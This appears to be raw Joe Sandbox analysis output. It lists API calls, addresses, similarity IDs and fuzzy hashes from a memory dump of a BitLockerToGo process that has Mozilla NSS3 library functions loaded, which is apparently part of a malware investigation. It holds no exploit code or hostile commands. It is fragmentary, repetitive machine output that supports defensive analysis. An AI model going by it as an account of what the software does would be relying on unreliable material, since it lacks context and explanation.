                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: K11_$Digest$Error$BeginContextDestroyFinalFindResultTag_Util
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1091488953-0
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000000,?,?,00000000,?,?,6C69D9E4,00000000), ref: 6C69DC30
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,00000000,?,?,6C69D9E4,00000000), ref: 6C69DC4E
                                                                                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,?,6C69D9E4,00000000), ref: 6C69DC5A
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C69DC7E
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C69DCAD
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Alloc_Util$Arenamemcpy
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2632744278-0
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(00000000,00000000,00000038,?,6C65E728,?,00000038,?,?,00000000), ref: 6C662E52
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C662E66
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C662E7B
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000000), ref: 6C662E8F
                                                                                                                                                                                                                                                                                                                                                          • PL_HashTableLookup.NSS3(?,?), ref: 6C662E9E
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C662EAB
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C662F0D
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalEnterSectionUnlockValue$HashLookupTable
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3106257965-0
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(?,6C6ACD93,?), ref: 6C6ACEEE
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A14C0: TlsGetValue.KERNEL32 ref: 6C6A14E0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A14C0: EnterCriticalSection.KERNEL32 ref: 6C6A14F5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A14C0: PR_Unlock.NSS3 ref: 6C6A150D
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C6ACD93,?), ref: 6C6ACEFC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: TlsGetValue.KERNEL32(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A10F3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: EnterCriticalSection.KERNEL32(?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A110C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A1141
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PR_Unlock.NSS3(?,?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A1182
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: TlsGetValue.KERNEL32(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A119C
                                                                                                                                                                                                                                                                                                                                                          • SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C6ACD93,?), ref: 6C6ACF0B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6A08B4
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C6ACD93,?), ref: 6C6ACF1D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C698D2D,?,00000000,?), ref: 6C69FB85
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C69FBB1
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C6ACD93,?), ref: 6C6ACF47
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C6ACD93,?), ref: 6C6ACF67
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(?,00000000,6C6ACD93,?,?,?,?,?,?,?,?,?,?,?,6C6ACD93,?), ref: 6C6ACF78
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4291907967-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e40269497445565c2e889eedd700ffab6c87b6f75f8b9824c25f5cd87f97302b
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4611D5A5A00205ABEB00ABE66C41B6BB5EC9F4924DF044039EC0AD7741FB61DD0986BA
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C658C1B
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32 ref: 6C658C34
                                                                                                                                                                                                                                                                                                                                                          • PL_ArenaAllocate.NSS3 ref: 6C658C65
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C658C9C
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C658CB6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EDD70: TlsGetValue.KERNEL32 ref: 6C6EDD8C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C6EDDB4
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
                                                                                                                                                                                                                                                                                                                                                          • String ID: KRAM
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4127063985-3815160215
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c4c4e2c7382c73b00e138ae6d7bb3c8ce357a73236845575e63f43c93890dbad
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: c5d47d31f77a9da21aee573c48a34f2c0de83b114ccad0bf60ed3d4ff4d18ade
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c4c4e2c7382c73b00e138ae6d7bb3c8ce357a73236845575e63f43c93890dbad
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6821E5B16156008FD700AF78C484559FBF0FF0A308F55896ED888CBB11DB30D89ACB99
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PK11_GetInternalKeySlot.NSS3(?,?,?,6C682E62,?,?,?,?,?,?,?,00000000,?,?,?,6C654F1C), ref: 6C668EA2
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C68F854
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C68F868
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C68F882
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68F820: free.MOZGLUE(04C483FF,?,?), ref: 6C68F889
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C68F8A4
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C68F8AB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C68F8C9
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68F820: free.MOZGLUE(280F10EC,?,?), ref: 6C68F8D0
                                                                                                                                                                                                                                                                                                                                                          • PK11_IsLoggedIn.NSS3(?,?,?,6C682E62,?,?,?,?,?,?,?,00000000,?,?,?,6C654F1C), ref: 6C668EC3
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,6C682E62,?,?,?,?,?,?,?,00000000,?,?,?,6C654F1C), ref: 6C668EDC
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,6C682E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6C668EF1
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C668F20
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
                                                                                                                                                                                                                                                                                                                                                          • String ID: b.hl
APIs
• TlsGetValue.KERNEL32(?,00000000,6C6461C4,?,6C645639,00000000), ref: 6C698991
• TlsGetValue.KERNEL32(?,?,?,?,?,6C645639,00000000), ref: 6C6989AD
• EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C645639,00000000), ref: 6C6989C6
• PR_WaitCondVar.NSS3 ref: 6C6989F7
• PR_Unlock.NSS3(?,?,?,?,?,?,?,6C645639,00000000), ref: 6C698A0C
  • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307AD
  • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307CD
  • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307D6
  • Part of subcall function 6C6307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C5C204A), ref: 6C6307E4
  • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,6C5C204A), ref: 6C630864
  • Part of subcall function 6C6307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C630880
  • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,6C5C204A), ref: 6C6308CB
  • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(?,?,6C5C204A), ref: 6C6308D7
  • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(?,?,6C5C204A), ref: 6C6308FB
Strings
Memory Dump Source
• Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
Similarity
• API ID: Value$calloc$CondCriticalEnterSectionUnlockWait
• String ID: 9Vdl
APIs
• PR_EnterMonitor.NSS3 ref: 6C752CA0
• PR_ExitMonitor.NSS3 ref: 6C752CBE
• calloc.MOZGLUE(00000001,00000014), ref: 6C752CD1
• strdup.MOZGLUE(?), ref: 6C752CE1
• PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6C752D27
Strings
• Loaded library %s (static lib), xrefs: 6C752D22
Memory Dump Source
• Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
Similarity
• API ID: Monitor$EnterExitPrintcallocstrdup
• String ID: Loaded library %s (static lib)
APIs
• TlsGetValue.KERNEL32 ref: 6C6468FB
• EnterCriticalSection.KERNEL32 ref: 6C646913
• PORT_FreeArena_Util.NSS3 ref: 6C64693E
• PR_Unlock.NSS3 ref: 6C646946
• DeleteCriticalSection.KERNEL32 ref: 6C646951
• free.MOZGLUE ref: 6C64695D
• PR_Unlock.NSS3 ref: 6C646968
  • Part of subcall function 6C6EDD70: TlsGetValue.KERNEL32 ref: 6C6EDD8C
  • Part of subcall function 6C6EDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C6EDDB4
Memory Dump Source
• Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$UnlockValue$Arena_DeleteEnterFreeLeaveUtilfree
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1628394932-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f9b9a5f8cc6bec723e82b905396b5148b02bd36573eb7dff1d5c8ca828ddab7e
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 69cda4900e450cff1f3a4984e07f8fda942ca25d0e6bf130de0f27b5eb7534da
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9b9a5f8cc6bec723e82b905396b5148b02bd36573eb7dff1d5c8ca828ddab7e
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 011149B16086059FDB00AF78C48856EBBF4FF46349F058569D899DB601EB30D889CB96
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6C64BDCA
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6487ED,00000800,6C63EF74,00000000), ref: 6C6A1000
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0FF0: PR_NewLock.NSS3(?,00000800,6C63EF74,00000000), ref: 6C6A1016
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0FF0: PL_InitArenaPool.NSS3(00000000,security,6C6487ED,00000008,?,00000800,6C63EF74,00000000), ref: 6C6A102B
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C64BDDB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: TlsGetValue.KERNEL32(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A10F3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: EnterCriticalSection.KERNEL32(?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A110C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A1141
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PR_Unlock.NSS3(?,?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A1182
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: TlsGetValue.KERNEL32(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A119C
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C64BDEC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PL_ArenaAllocate.NSS3(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A116E
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(00000000,00000000,?), ref: 6C64BE03
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C698D2D,?,00000000,?), ref: 6C69FB85
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C69FBB1
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C64BE22
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C64BE30
                                                                                                                                                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C64BE3B
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: ArenaUtil$Alloc_$AllocateArena_ErrorValue$CopyCriticalEnterFreeInitItem_LockPoolSectionUnlockcallocmemcpy
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1821307800-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: bfff5a5e91e41aae6c467454c29248b810d46c84600c07f75331603a8c636430
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1301DB69A4561176F71016A6BC01F9F79484FD23CDF148031FF059AB82FB51E91B82BE
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6487ED,00000800,6C63EF74,00000000), ref: 6C6A1000
                                                                                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3(?,00000800,6C63EF74,00000000), ref: 6C6A1016
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7098D0: calloc.MOZGLUE(00000001,00000084,6C630936,00000001,?,6C63102C), ref: 6C7098E5
                                                                                                                                                                                                                                                                                                                                                          • PL_InitArenaPool.NSS3(00000000,security,6C6487ED,00000008,?,00000800,6C63EF74,00000000), ref: 6C6A102B
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(00000000,?,?,6C6487ED,00000800,6C63EF74,00000000), ref: 6C6A1044
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000,?,00000800,6C63EF74,00000000), ref: 6C6A1064
                                                                                                                                                                                                                                                                                                                                                          Strings
Similarity
• API ID: calloc$ArenaInitLockPoolValuefree
• String ID: security
• API String ID: 3379159031-3315324353
• Opcode ID: 5e7d8c360fe3ef703217c00113dfabda8d75467127bb2326fbddb951a35594ad
• Instruction ID: a03e7e89b2ab547f34aabb25dc4432fe51d9f644812989a84f9199e4142736a9
• Opcode Fuzzy Hash: 5e7d8c360fe3ef703217c00113dfabda8d75467127bb2326fbddb951a35594ad
• Instruction Fuzzy Hash: FA014830A00250DBEB202FBE9C08A867A78FF03799F010125E808D7A51EF60C947DBDD
APIs
• PR_SetError.NSS3(FFFFE001,00000000), ref: 6C6D1C74
  • Part of subcall function 6C6EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6EC2BF
• DeleteCriticalSection.KERNEL32(?), ref: 6C6D1C92
• free.MOZGLUE(?), ref: 6C6D1C99
• DeleteCriticalSection.KERNEL32(?), ref: 6C6D1CCB
• free.MOZGLUE(?), ref: 6C6D1CD2
Memory Dump Source
• Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
Similarity
• API ID: CriticalDeleteSectionfree$ErrorValue
• String ID:
• API String ID: 3805613680-0
• Opcode ID: 0d76da151eabcd36146ecf722a49cc05b462c1a6b1060c5ab94dd1f070d9ae3a
• Instruction ID: 649dddf822b5e4a21c32da24fbef50501557654b0fdf3d05ca6bc9116a2ff908
• Opcode Fuzzy Hash: 0d76da151eabcd36146ecf722a49cc05b462c1a6b1060c5ab94dd1f070d9ae3a
• Instruction Fuzzy Hash: 050196B1F052105FDF10AFE5BD0DB4D7BB4A70B319F510135E90EA6A40D775A1054799
APIs
• SECITEM_ZfreeItem_Util.NSS3(?,00000000,00000000,00000678,?,?,6C6D5F34,00000A20), ref: 6C6E49EC
  • Part of subcall function 6C69FAB0: free.MOZGLUE(?,-00000001,?,?,6C63F673,00000000,00000000), ref: 6C69FAC7
• SECITEM_ZfreeItem_Util.NSS3(?,00000000,6C6D5F34,00000A20,?,?,?,?,?,?,?,?,?,6C6DAAD4), ref: 6C6E49F9
• SECITEM_ZfreeItem_Util.NSS3(?,00000000,?,?,6C6D5F34,00000A20,?,?,?,?,?,?,?,?,?,6C6DAAD4), ref: 6C6E4A06
• free.MOZGLUE(?,?,?,?,?,6C6D5F34,00000A20), ref: 6C6E4A16
• free.MOZGLUE(?,?,?,?,?,6C6D5F34,00000A20), ref: 6C6E4A1C
Strings
Memory Dump Source
• Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
